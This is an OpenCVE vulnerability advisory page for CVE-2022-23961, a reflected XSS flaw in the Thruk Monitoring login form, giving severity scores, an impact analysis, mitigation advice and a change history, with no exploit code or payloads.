Description
In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface.
Published: 2026-05-08
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A reflected cross‑site scripting flaw has been identified in the login field of the Thruk Monitoring web interface. Unauthenticated remote attackers can send specially crafted input through the login form, which is then echoed back in the response without proper neutralisation. This enables attackers to run arbitrary JavaScript in the victim's browser while they view the monitoring dashboard, potentially leading to session hijacking, credential theft, or defacement of the interface.

Affected Systems

All installations of Thruk Monitoring through version 2.46.3 are affected; the vulnerability has no vendor‑specific modifiers and applies universally to those releases.

Risk and Exploitability

The flaw can be triggered without authentication and only requires access to the monitoring interface’s login page, so the attack vector is remote over HTTP or HTTPS. Exploitation involves submitting a crafted request to the login endpoint and observing the reflected payload. The CVSS score of 6.1 indicates a moderate severity. The EPSS score of 0.00059 (reported as < 1%) shows a very low but non‑zero probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog, implying that widespread exploitation is not yet documented.

Generated by OpenCVE AI on May 8, 2026 at 20:03 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Thruk Monitoring to a version later than 2.46.3 that contains the fixed login page.
  • If an update cannot be applied immediately, limit access to the monitoring interface to trusted networks or require additional authentication (e.g., VPN or IP whitelisting) so that only authorized users can reach the login form.
  • Deploy a web application firewall or similar filtering that blocks script payloads before they reach the application.

Generated by OpenCVE AI on May 8, 2026 at 20:03 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 13 May 2026 11:00:00 +0000

Type Values Removed Values Added
First Time appeared Herolab
Herolab thruk Monitoring
Vendors & Products Herolab
Herolab thruk Monitoring

Fri, 08 May 2026 20:30:00 +0000

Type Values Removed Values Added
Title Reflected XSS in Thruk Monitoring Login Form

Fri, 08 May 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 08 May 2026 07:15:00 +0000

Type Values Removed Values Added
Title Reflected XSS in Thruk Monitoring Login Form
Weaknesses CWE-79

Fri, 08 May 2026 05:00:00 +0000

Type Values Removed Values Added
Description In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface.
References

Subscriptions

Herolab Thruk Monitoring
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-08T13:49:44.094Z

Reserved: 2022-01-26T00:00:00.000Z

Link: CVE-2022-23961

cve-icon Vulnrichment

Updated: 2026-05-08T13:49:40.735Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-05-08T05:16:08.700

Modified: 2026-05-08T16:08:15.570

Link: CVE-2022-23961

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-13T10:51:48Z

Weaknesses